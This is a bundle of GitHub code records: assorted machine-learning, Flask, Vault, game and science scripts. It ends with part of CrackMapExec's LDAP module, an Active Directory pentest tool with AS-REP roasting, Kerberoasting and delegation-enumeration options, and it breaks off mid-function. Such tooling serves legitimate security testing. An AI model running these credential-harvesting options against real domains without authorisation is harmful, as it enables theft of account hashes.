The math involved in doing that on an RGB seems way\n # beyond the scope of this project and my desire to do it\n\n return redirect('/')\n\n@app.route('/reset')\ndef reset():\n session.clear()\n return redirect('/')\n\n@app.errorhandler(404)\ndef unknown(err):\n return '404 : NOT FOUND!'\n\nif __name__==\"__main__\":\n app.run(debug=True)","repo_name":"Pat-Tee/CodingDojo","sub_path":"Python/GreatNumberGame/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"7186478057","text":"from collections.abc import Sequence\nfrom decimal import Decimal\n\ndef format(\n number: Decimal | float | str,\n decimal_sep: str,\n decimal_pos: int | None = ...,\n grouping: int | Sequence[int] = ...,\n thousand_sep: str = ...,\n force_grouping: bool = ...,\n use_l10n: bool | None = ...,\n) -> str: ...\n","repo_name":"blakeNaccarato/pylance-stubs-unofficial","sub_path":"django-stubs/utils/numberformat.pyi","file_name":"numberformat.pyi","file_ext":"pyi","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
{"seq_id":"75067623","text":"from transformers import WhisperForConditionalGeneration, WhisperFeatureExtractor, WhisperProcessor\nimport torch\nimport torchaudio\nfrom torchaudio.functional import resample\n\ndef transcribe(path):\n raw_audio, sr = torchaudio.load(path)\n sr = 16000\n #raw_audio = resample(waveform=raw_audio, orig_freq=sr, new_freq=16000)\n raw_audio = raw_audio.squeeze(dim = 0)\n # feature_extractor = WhisperFeatureExtractor.from_pretrained(\"openai/whisper-tiny\")\n processor = WhisperProcessor.from_pretrained(\"openai/whisper-tiny\")\n\n model = WhisperForConditionalGeneration.from_pretrained(\"openai/whisper-tiny\").cuda()\n input_features = processor(raw_audio, sampling_rate=sr, return_tensors=\"pt\").input_features\n with torch.no_grad():\n generated_ids = model.generate(input_features.to(\"cuda\"), language=\"<|ja|>\", task=\"transcribe\")[0]\n transcription = processor.decode(generated_ids)\n return processor.tokenizer._normalize(transcription)\n\ndef main():\n path = \"data/data/clean/my_audio_0.wav\"\n result = transcribe(path)\n print(\"\")\n print(result)\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"Shiiya0418/Whisper-Sample-for-Jetson","sub_path":"fast_asr.py","file_name":"fast_asr.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"23678693112","text":"from sklearn.metrics import confusion_matrix, classification_report\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef evaluate_model(model, test_generator):\n # Evaluate the model on the test data\n score = model.evaluate(test_generator, verbose=0)\n\n # Print the test loss and accuracy\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n\ndef plot_confusion_matrix(model, test_generator):\n # Generate predictions; predict() returns class probabilities\n # (assuming a softmax output), so collapse them to label indices\n # before building the confusion matrix\n y_pred = np.argmax(model.predict(test_generator), axis=1)\n y_true = test_generator.classes\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n\n # Plot confusion matrix\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.title('Confusion matrix')\n plt.colorbar()\n plt.tight_layout()\n plt.show()\n\ndef plot_learning_curve(history):\n # Plot training & validation accuracy values\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model 
accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n # Plot training & validation loss values\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n","repo_name":"Shahupdates/cnnClassification","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6206559381","text":"#!/usr/bin/python3.5\n\nfrom __future__ import print_function\nimport hvac\nimport argparse\nimport getpass\nimport json\nimport sys\n\ndefault_vault_server = 'https://bcon.prod.wow.avvo.com:8200'\nvault_root_path = 'services/jobrunner/credentials/secret/'\n\ndef log_console(*args, **kwargs):\n print(__file__ + ': ', file=sys.stderr, end='')\n print(*args, file=sys.stderr, **kwargs)\n\ndef get_client(vault_server=default_vault_server, vault_appid=None):\n client = hvac.Client(url=vault_server, verify=False)\n vault_user = getpass.getuser()\n\n log_console('Connecting [%s] to vault server [%s] using %s' %\n (vault_user, vault_server, 'ldap' if vault_appid is None else 'appid'))\n if vault_appid is None:\n client.auth_ldap(vault_user, getpass.getpass(prompt='Please enter your password to connect to vault: '))\n else:\n client.auth_app_id(vault_appid, vault_user)\n\n log_console('Vault key root path: [%s]' % vault_root_path)\n return client\n\ndef read_key(client, key, showToConsole=False):\n log_console('Reading key [%s] from vault' % key)\n secret_value = client.read(vault_root_path + key)\n value = secret_value['data']['value']\n if showToConsole:\n print(value)\n return value\n\ndef write_key(client, key, value):\n log_console('Writing key [%s] with value [%s] into vault' % (key, value))\n client.write(vault_root_path + key, value=value)\n log_console('Done')\n\ndef delete_key(client, key):\n log_console('Deleting key [%s] from vault' % key)\n client.delete(vault_root_path + key)\n log_console('Done')\n\ndef list_key(client):\n log_console('Listing keys from vault')\n print(client.list(vault_root_path))\n log_console('Done')\n\ndef vault_action(args, vault_server):\n client = None\n try:\n if args.action == 'read':\n client = get_client(vault_server, vault_appid=args.appid)\n read_key(client, args.key, showToConsole=True)\n elif args.action == 'write':\n client = get_client(vault_server, vault_appid=args.appid)\n write_key(client, args.key, args.value)\n elif args.action == 'delete':\n client = get_client(vault_server, vault_appid=args.appid)\n delete_key(client, args.key)\n elif args.action == 'list':\n client = get_client(vault_server, vault_appid=args.appid)\n list_key(client)\n else:\n log_console('Invalid action, only support read/write/delete')\n exit(1)\n\n finally:\n if client is not None:\n client.logout()\n\nif __name__ == '__main__':\n \"\"\"This script allows easier access to vault from cluster/gateway\"\"\"\n\n parser = argparse.ArgumentParser(description = 'Read, write/update, or delete vault key used by the data team')\n parser.add_argument('--vault_server', required=False, default=default_vault_server, help='the vault server to connect to')\n parser.add_argument('--appid', required=False, default=None, help='the vault app id to be used instead of ldap')\n\n subparsers = parser.add_subparsers(help='vault actions')\n subparsers.required = 
True\n subparsers.dest = 'action'\n\n # create the parser for the 'read' command\n parser_read = subparsers.add_parser('read', help='read a key from vault store')\n parser_read.add_argument('--key', required=True, help='the vault key to be operated on')\n\n # create the parser for the 'write' command\n parser_write = subparsers.add_parser('write', help='write a key to vault store')\n parser_write.add_argument('--key', required=True, help='the vault key to be operated on')\n parser_write.add_argument('--value', required=True, help='value of the vault key to be written')\n\n # create the parser for the 'delete' command\n parser_delete = subparsers.add_parser('delete', help='delete a key from vault store')\n parser_delete.add_argument('--key', required=True, help='the vault key to be operated on')\n\n # create the parser for the 'list' command\n parser_list = subparsers.add_parser('list', help='list all entries under given key from vault store')\n\n args = parser.parse_args()\n\n vault_action(args, args.vault_server)\n","repo_name":"rlee21/snippets","sub_path":"python/wdep/scripts/data_vault.py","file_name":"data_vault.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40791698309","text":"from datetime import datetime\nfrom bson.binary import UUIDLegacy\n\nfrom database import Database\n\n__author__ = 'jamie'\n\nCOLLECTION = \"aroundtheworld\"\n\n\nclass AroundTheWorld(object):\n\n @staticmethod\n def add_game(_id, name, numberOfDarts, numberOfDartsAtEachNumber, mode):\n\n if Database.insert(COLLECTION, {\"_id\": _id, \"username\": name, \"numberOfDarts\": numberOfDarts, \"numberOfDartsAtEachNumber\":\n numberOfDartsAtEachNumber, \"mode\": mode, \"date\": datetime.now()}):\n return True\n return False\n\n @staticmethod\n def get_games(name):\n games = Database.find(COLLECTION, {\"username\": name}, \"date\")\n return games\n\n @staticmethod\n def get_by_id(game_id):\n game = Database.find_one(COLLECTION, {\"_id\": UUIDLegacy(game_id)})\n return game\n\n @staticmethod\n def get_leaderboard(numResults = None):\n if numResults:\n results = Database.find(COLLECTION, {}, \"numberOfDarts\", 1, numResults)\n else:\n results = Database.find(COLLECTION, {}, \"numberOfDarts\", 1)\n\n return results\n","repo_name":"jkerr123/darts-scorer","sub_path":"src/models/aroundtheboard.py","file_name":"aroundtheboard.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13269036116","text":"import argparse\nimport sys\nimport random\nfrom Bio import SeqIO\n\ndef GetArgs():\n def ParseArgs(parser):\n class Parser(argparse.ArgumentParser):\n def error(self, message):\n sys.stderr.write('error: %s\\n' % message)\n self.print_help()\n sys.exit(2)\n\n parser = Parser(description='Sample sequences form A GISAID FASTA file.')\n parser.add_argument('-i', '--input_file',\n required = True,\n help = 'Input FASTA file (required). Fasta file headers must have been reformatted with gisaid_reformat_fasta_headers.py',\n type = str)\n parser.add_argument('-o', '--output_file',\n required = True,\n help = 'Output Fasta file (required).',\n type = str)\n parser.add_argument('-n', '--num_samples',\n required = False,\n help = 'Number of sequences to sample. 
(default = 1000)',\n default = 1000,\n type = int)\n \n return parser.parse_args()\n\n parser = argparse.ArgumentParser()\n args = ParseArgs(parser)\n \n return args\n\ndef main():\n args = GetArgs()\n input_file = args.input_file\n output_file = args.output_file\n num_samples = args.num_samples\n \n seqs = dict()\n for seq in SeqIO.parse(input_file, 'fasta'):\n seqs[seq.id] = seq\n \n seq_ids = random.sample(list(seqs.keys()), k=num_samples)\n \n f = open(output_file, 'w')\n for k in seq_ids:\n SeqIO.write(seqs[k], f, 'fasta')\n f.close()\n \nif __name__ == '__main__':\n main()","repo_name":"analytic-garden/B.1.1.7-Mutations","sub_path":"gisaid_sample_seqs.py","file_name":"gisaid_sample_seqs.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13768827263","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental import preprocessing\n\nnp.set_printoptions(precision=3, suppress=True)\n\n# Read dataset from file\nraw_dataset = pd.read_csv(\"../data/1160629000_121_308_train_receive.csv\", index_col=None)\nraw_dataset = raw_dataset.astype({'index':'float','event_time':'float', 'value':'int', 'valueThreshold':'int', 'isActive':'bool'})\ndataset = raw_dataset.copy()\ndataset = dataset.dropna().drop(['isActive'], axis=1)\ndataset['event_time'] = (dataset['event_time']-1487508915.0)/1000\n\n# Split data into training and testing\ntrain_dataset = dataset.sample(frac=0.8, random_state=0)\ntest_dataset = dataset.drop(train_dataset.index)\n\n# Split input features and lables\ntrain_features = train_dataset.copy()\ntest_features = test_dataset.copy()\ntrain_labels = train_features.pop('event_time')\ntest_labels = test_features.pop('event_time')\n\n# Normalize whole dataset\nnormalizer = preprocessing.Normalization()\nnormalizer.adapt(np.array(train_features))\n\n# Model Init fucntion\ndef build_and_compile_model(norm):\n inputs = tf.keras.layers.Input(shape=(3,))\n model = keras.Sequential([\n inputs,\n norm,\n layers.Dense(64, activation='relu'),\n layers.Dense(64, activation='relu'),\n layers.Dense(1)\n ])\n # Setup optimizer, learning rate, and loss function\n model.compile(loss='mean_absolute_error',\n optimizer=tf.keras.optimizers.Adam(0.001))\n return model\n\nDNN_multi_var_model = build_and_compile_model(normalizer)\n\n# Save Train loss each epochs for later analysis\nhistory = DNN_multi_var_model.fit(\n train_features, train_labels,\n validation_split=0.2,\n verbose=0, epochs=100)\n\n# Plot loss during training\n# def plot_loss(history):\n# plt.plot(history.history['loss'], label='loss')\n# plt.plot(history.history['val_loss'], label='val_loss')\n# plt.ylim([0, 10])\n# plt.xlabel('Epoch')\n# plt.ylabel('Error [event_time]')\n# plt.legend()\n# plt.grid(True)\n# plt.show()\n# plot_loss(history)\n\n# Evaluate model in testing dataset\ntest_results = {}\ntest_results['DNN_multi_var_model'] = DNN_multi_var_model.evaluate(test_features, test_labels, verbose=0)\nprint (pd.DataFrame(test_results, index=['Mean absolute error [event_time]']).T)\n\nDNN_multi_var_model.save(\"../exported_models/DNN_multi_regression\")\nconverter = tf.lite.TFLiteConverter.from_saved_model(\"../exported_models/DNN_multi_regression\")\ntflite_model = converter.convert()\nopen(\"../exported_models/tflite_model/DNN_multi_regression.tflite\", 
\"wb\").write(tflite_model)\n\n# Ploting result\n# test_predictions = DNN_multi_var_model.predict(test_features).flatten()\n# a = plt.axes(aspect='equal')\n# plt.scatter(test_labels, test_predictions)\n# plt.xlabel('True Values [event_time]')\n# plt.ylabel('Predictions [event_time]')\n# lims = [0, 50]\n# plt.xlim(lims)\n# plt.ylim(lims)\n# _ = plt.plot(lims, lims)\n# plt.show()\n\n\n","repo_name":"rdsea/sys4bigml","sub_path":"tutorials/edgemodelop/edge_client/edge_machine_learning/DNN_multiple_regression.py","file_name":"DNN_multiple_regression.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71124649332","text":"#!/usr/bin/env python3\n\nimport numpy\nimport unittest\nfrom afqmctools.analysis.extraction import extract_observable\nfrom afqmctools.analysis.average import average_one_rdm\n\n\nclass TestRDM(unittest.TestCase):\n\n def test_average(self):\n f = 'qmc.s000.stat.h5'\n # Old format\n # base = 'Observables/BackPropagated/FullOneRDM/Average_1'\n rdm_av, rdm_errs = average_one_rdm(f, eqlb=1, ix=1)\n self.assertAlmostEqual(2*numpy.sum(rdm_av.real), 9.990239713872079)\n self.assertAlmostEqual(2*numpy.sum(rdm_av.imag), 0.009522316560114931)\n\n def test_extract(self):\n f = 'qmc.s000.stat.h5'\n # Old format\n # base = 'Observables/BackPropagated/FullOneRDM/Average_0'\n dm = 2*extract_observable(f, ix=0)\n self.assertAlmostEqual(numpy.sum(dm.real), 499.49878268185375)\n self.assertAlmostEqual(numpy.sum(dm.imag), 1.2453436020111393)\n\n def test_extract_single(self):\n f = 'qmc.s000.stat.h5'\n # base = 'Observables/BackPropagated/FullOneRDM/Average_3'\n dm = extract_observable(f, ix=3, sample=37)\n self.assertAlmostEqual(numpy.sum(dm).real, 5.00103256421043)\n\n\nif __name__ == '__main__':\n import sys\n import os\n dir_path = os.path.dirname(os.path.realpath(__file__))\n sys.path.append(os.path.join(dir_path, '../'))\n from check_h1e_conv import plot_convergence\n plot_convergence('qmc.s000.stat.h5')\n unittest.main()\n","repo_name":"QMCPACK/qmcpack","sub_path":"examples/afqmc/06-methane_converge_back_prop/reference/test_obs.py","file_name":"test_obs.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"21"} +{"seq_id":"5723750119","text":"from imporlist import *\r\nfrom gamefiles.abilities import Abilities\r\n\r\nclass Unit:\r\n def __init__(self) -> None:\r\n self.position = [SCREENWIDTH//2, SCREENHEIGHT//2]\r\n self.player = pygame.Surface((PLAYERSIZE, PLAYERSIZE))\r\n print(\"pos: %s %s\" % (self.position, self.player))\r\n\r\nclass Player(Unit, Abilities):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n # self.position = [SCREENWIDTH//2, SCREENHEIGHT//2]\r\n # self.player = pygame.Surface((PLAYERSIZE, PLAYERSIZE))\r\n self.player.fill(PLAYERCOLOR)\r\n\r\n\r\n def collect_inputs(self) -> None:\r\n pressed = pygame.key.get_pressed()\r\n\r\n if pressed[pygame.K_RIGHT]:\r\n print(\"K_RIGHT\")\r\n self.position[0] += STEPSIZE\r\n\r\n if pressed[pygame.K_LEFT]:\r\n print(\"K_LEFT\")\r\n self.position[0] -= STEPSIZE\r\n \r\n if pressed[pygame.K_UP]:\r\n print(\"K_UP\")\r\n self.position[1] -= STEPSIZE\r\n \r\n if pressed[pygame.K_DOWN]:\r\n print(\"K_DOWN\")\r\n self.position[1] += STEPSIZE\r\n \r\n if pressed[pygame.K_SPACE]:\r\n print(\"K_PSACE\")\r\n # self.pulse_aoe = True\r\n\r\n\r\n def move(self, surface):\r\n surface.blit(self.player, 
self.position)","repo_name":"BanyaszJ/UntitledShapeGame","sub_path":"gamefiles/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74436243574","text":"#!/usr/bin/python3\n\"\"\"\nSquare with area\n\"\"\"\n\n\nclass Square:\n \"\"\"\n definition of a square\n \"\"\"\n def __init__(self, size=0):\n \"\"\"\n Args:\n size: size of square\n \"\"\"\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n elif size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n\n def area(self):\n \"\"\"\n returns area of a square\n \"\"\"\n return(self.__size ** 2)\n","repo_name":"Chezzo-codes/alx-higher_level_programming","sub_path":"0x06-python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27005276320","text":"# i=1\r\n# while i<=5:\r\n# j=1\r\n# while j<=5:\r\n# print(\"*\",end=\" \")\r\n# j+=1\r\n# print()\r\n# i+=1\r\n \r\nrow=1\r\ni=0\r\nj=4\r\nwhile i<=7:\r\n column=1\r\n while column<=5:\r\n if column==1 or (row==column+2 and column>1):\r\n print(\"*\",end=\"\")\r\n elif ((row==i and column==j) and column>0):\r\n print(\"*\",end=\"\")\r\n column+=1\r\n i+=1\r\n j-=1\r\n \r\n print() \r\n row+=1\r\n\r\n\r\n ","repo_name":"saloni-080601/list.py","sub_path":"karuna.py","file_name":"karuna.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19124926702","text":"import numpy as np\nimport cv2\nimport os\nimport sys\nimport keras\nfrom keras.applications.mobilenet import MobileNet\nfrom keras.models import Model, Sequential, load_model\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ModelCheckpoint\nimport keras.layers as L\nfrom keras.optimizers import SGD, Adam\nfrom os.path import join\nimport pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder, LabelBinarizer\nimport matplotlib.pyplot as plt\nimport sys\n\ntemperature = 10\n\ndef pretrained_small():\n model = MobileNet(input_shape=(128, 128, 3), alpha=1.0, depth_multiplier=1, dropout=1e-3, include_top=False, weights='imagenet', input_tensor=None, pooling=None, classes=8)\n layer_name = 'conv_pw_6'\n intermodel = Model(inputs=model.input, outputs=model.get_layer(layer_name).output)\n return intermodel\n\ndef shuffle_in_unison_scary(X, Y1, Y2):\n rng_state = np.random.get_state()\n np.random.shuffle(X)\n np.random.set_state(rng_state)\n np.random.shuffle(Y1)\n np.random.set_state(rng_state)\n np.random.shuffle(Y2)\n return X, Y1, Y2\n\ndef getdata():\n num_images=3105\n X = np.zeros((num_images, 128, 128, 3))\n Y1 = np.zeros((num_images,), dtype=int)\n Y2 = np.zeros((num_images,), dtype=int)\n mydir1 = 'finaldata/paths/'\n mydir2 = 'finaldata/'\n counter=0\n summ=0\n for labelfile in os.listdir(mydir1):\n print(labelfile)\n fullpath = join(mydir1, labelfile)\n data = pd.read_csv(fullpath)\n length = len(data)\n for i in range(length):\n imgname = str(data[\"filepath\"][i])\n if imgname == 'nan': continue\n imgname = imgname[2:]\n direction = data['direction'][i]\n distracted = data['distracted'][i]\n imagepath=join(mydir2, imgname)\n img = cv2.imread(imagepath)\n img = cv2.resize(img, (128, 128))\n X[counter, :, :, :] = img[:, :, 
:]\n Y1[counter] = int(direction)\n Y2[counter] = int(distracted)\n counter+=1\n print(\"done\")\n print(counter)\n X -= 128\n X /= 128\n enc=LabelBinarizer()\n Y1=enc.fit_transform(Y1.reshape(Y1.shape[0], 1))\n Y2=enc.fit_transform(Y2.reshape(Y2.shape[0], 1))\n np.save('distractiondata/X.npy', X)\n np.save('distractiondata/Y1.npy', Y1)\n np.save('distractiondata/Y2.npy', Y2)\n return\n\ndef getsaveddata():\n X = np.load('distractiondata/X.npy')\n Y1 = np.load('distractiondata/Y1.npy')\n Y2 = np.load('distractiondata/Y2.npy')\n return X, Y1, Y2\n\ndef trainRealTransfer2_withoutgen():\n batchsize = 64\n X, Y1, Y2= getsaveddata()\n X, Y1, Y2= shuffle_in_unison_scary(X, Y1, Y2)\n intermodel = pretrained_small()\n print(Y2.shape)\n x = intermodel.output\n x = L.Conv2D(filters=512, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu')(x)\n x = L.Conv2D(filters=512, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu')(x)\n x = L.Conv2D(filters=512, kernel_size=(3, 3), strides=(2, 2), padding='same', activation='relu')(x)\n x = L.Conv2D(filters=512, kernel_size=(3, 3), strides=(1, 1), padding='same', activation='relu')(x)\n x = L.Flatten()(x)\n x = L.Dense(1024, activation='relu')(x)\n x = L.Dropout(0.5)(x)\n x = L.Dense(512, activation='relu')(x)\n x = L.Dropout(0.5)(x)\n x1 = L.Dense(128, activation='relu')(x)\n x1 = L.Dropout(0.5)(x1)\n x1 = L.Dense(8)(x1)\n x1 = L.Activation('softmax', name='dir_out')(x1)\n x2 = L.Dense(128, activation='elu')(x)\n x2 = L.Dropout(0.5)(x2)\n x2 = L.Dense(1)(x2)\n x2 = L.Activation('sigmoid', name='dis_out')(x2)\n model = Model(inputs = intermodel.input, outputs = [x1, x2])\n filepath=\"models/distraction.h5\"\n loss = {\n 'dir_out':'categorical_crossentropy',\n 'dis_out':'binary_crossentropy'\n }\n model.compile(optimizer=Adam(lr=0.00005, decay=0.001), loss=loss, metrics=['accuracy'])\n checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='min')\n callback_list = [checkpoint]\n history = model.fit(x=X, y={'dir_out':Y1, 'dis_out':Y2}, batch_size=64, epochs=1, verbose=1, validation_split=0.2, callbacks=callback_list)\n # summarize history for accuracy\n\n\ndef inference_KD():\n model = load_model('models/distraction.h5')\n path = 'test/'\n correct=0\n l = len(os.listdir(path))\n while True:\n imgp = input('imgpath: ')\n img = cv2.imread(imgp)\n img = cv2.resize(img, (128, 128)).astype(np.float32)\n # cv2.imshow('win', img)\n # cv2.waitKey(0)\n img -= 128\n img = img/128\n \n output = model.predict(np.reshape(img, (1, 128, 128, 3)))\n prediction = np.array(output[0]).argmax()\n prediction2 = output[1]\n print('direction:', prediction, 'distraction score:', prediction2[0][0])\n \n\ndef main():\n choice = sys.argv[1]\n if choice == 'train':\n trainRealTransfer2_withoutgen()\n if choice == 'infer':\n inference_KD()\n\nmain()","repo_name":"chiragk156/PedestrianPrediction","sub_path":"train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32409373168","text":"# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py\n# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf\n\nimport requests\nimport logging\nimport configparser\nfrom cme.connection import *\nfrom cme.helpers.logger import highlight\nfrom cme.logger import CMEAdapter\nfrom cme.protocols.ldap.kerberos import KerberosAttacks\nfrom impacket.smbconnection 
import SMBConnection, SessionError\nfrom impacket.smb import SMB_DIALECT\nfrom impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION\nfrom impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS\nfrom impacket.krb5.types import KerberosTime, Principal\nfrom impacket.ldap import ldap as ldap_impacket\nfrom impacket.krb5 import constants\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom io import StringIO\n\nclass ldap(connection):\n\n    def __init__(self, args, db, host):\n        self.domain = None\n        self.server_os = None\n        self.os_arch = 0\n        self.hash = None\n        self.ldapConnection = None\n        self.lmhash = ''\n        self.nthash = ''\n        self.baseDN = ''\n        self.remote_ops = None\n        self.bootkey = None\n        self.output_filename = None\n        self.smbv1 = None\n        self.signing = False\n        self.smb_share_name = smb_share_name\n\n        connection.__init__(self, args, db, host)\n\n    @staticmethod\n    def proto_args(parser, std_parser, module_parser):\n        ldap_parser = parser.add_parser('ldap', help=\"own stuff using ldap\", parents=[std_parser, module_parser])\n        ldap_parser.add_argument(\"-H\", '--hash', metavar=\"HASH\", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')\n        ldap_parser.add_argument(\"--no-bruteforce\", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2)')\n        ldap_parser.add_argument(\"--continue-on-success\", action='store_true', help=\"continues authentication attempts even after successes\")\n        ldap_parser.add_argument(\"--port\", type=int, choices={389, 636}, default=389, help=\"LDAP port (default: 389)\")\n        dgroup = ldap_parser.add_mutually_exclusive_group()\n        dgroup.add_argument(\"-d\", metavar=\"DOMAIN\", dest='domain', type=str, default=None, help=\"domain to authenticate to\")\n        dgroup.add_argument(\"--local-auth\", action='store_true', help='authenticate locally to each target')\n        \n        egroup = ldap_parser.add_argument_group(\"Retrieve hashes on the remote DC\", \"Options to get hashes from Kerberos\")\n        egroup.add_argument(\"--asreproast\", help=\"Get AS_REP response ready to crack with hashcat\")\n        egroup.add_argument(\"--kerberoasting\", help='Get TGS ticket ready to crack with hashcat')\n        \n        vgroup = ldap_parser.add_argument_group(\"Retrieve useful information on the domain\", \"Options to play with Kerberos\")\n        vgroup.add_argument(\"--trusted-for-delegation\", action=\"store_true\", help=\"Get the list of users and computers with flag TRUSTED_FOR_DELEGATION\")\n        vgroup.add_argument(\"--admin-count\", action=\"store_true\", help=\"Get objects that have the value adminCount=1\")\n\n        return parser\n\n    def proto_logger(self):\n        self.logger = CMEAdapter(extra={\n            'protocol': 'LDAP',\n            'host': self.host,\n            'port': self.args.port,\n            'hostname': self.hostname\n        })\n\n    def get_os_arch(self):\n        try:\n            stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)\n            transport = DCERPCTransportFactory(stringBinding)\n            transport.set_connect_timeout(5)\n            dce = transport.get_dce_rpc()\n            if self.args.kerberos:\n                dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n            dce.connect()\n            try:\n                dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))\n            except DCERPCException as e:\n                if str(e).find('syntaxes_not_supported') >= 0:\n                    dce.disconnect()\n                    return 32\n                else:\n                    dce.disconnect()\n                    return 64\n\n        except Exception as e:\n            logging.debug('Error retrieving os arch of 
{}: {}'.format(self.host, str(e)))\n\n return 0\n\n def enum_host_info(self):\n self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]\n\n try:\n self.conn.login('' , '')\n except:\n #if \"STATUS_ACCESS_DENIED\" in e:\n pass\n\n self.domain = self.conn.getServerDNSDomainName()\n self.hostname = self.conn.getServerName()\n self.server_os = self.conn.getServerOS()\n self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']\n self.os_arch = self.get_os_arch()\n\n self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime(\"%Y-%m-%d_%H%M%S\")))\n\n if not self.domain:\n self.domain = self.hostname\n\n try:\n '''plaintext_login\n DC's seem to want us to logoff first, windows workstations sometimes reset the connection\n (go home Windows, you're drunk)\n '''\n self.conn.logoff()\n except:\n pass\n\n if self.args.domain:\n self.domain = self.args.domain\n \n if self.args.local_auth:\n self.domain = self.hostname\n\n #Re-connect since we logged off\n self.create_conn_obj()\n\n def print_host_info(self):\n self.logger.info(u\"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})\".format(self.server_os,\n ' x{}'.format(self.os_arch) if self.os_arch else '',\n self.hostname,\n self.domain,\n self.signing,\n self.smbv1))\n\n def kerberos_login(self, aesKey, kdcHost):\n # Create the baseDN\n domainParts = self.domain.split('.')\n self.baseDN = ''\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n if self.kdcHost is not None:\n target = self.kdcHost\n else:\n target = self.domain\n\n try:\n self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,\n self.aesKey, kdcHost=self.kdcHost) \n except ldap_impacket.LDAPSessionError as e:\n if str(e).find('strongerAuthRequired') >= 0:\n # We need to try SSL\n self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,\n self.aesKey, kdcHost=self.kdcHost)\n\n return True\n\n\n def plaintext_login(self, domain, username, password):\n self.username = username\n self.password = password\n self.domain = domain\n # Create the baseDN\n self.baseDN = ''\n domainParts = self.domain.split('.')\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n if self.kdcHost is not None:\n target = self.kdcHost\n else:\n target = domain\n\n if self.password == '' and self.args.asreproast:\n hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)\n if hash_TGT:\n 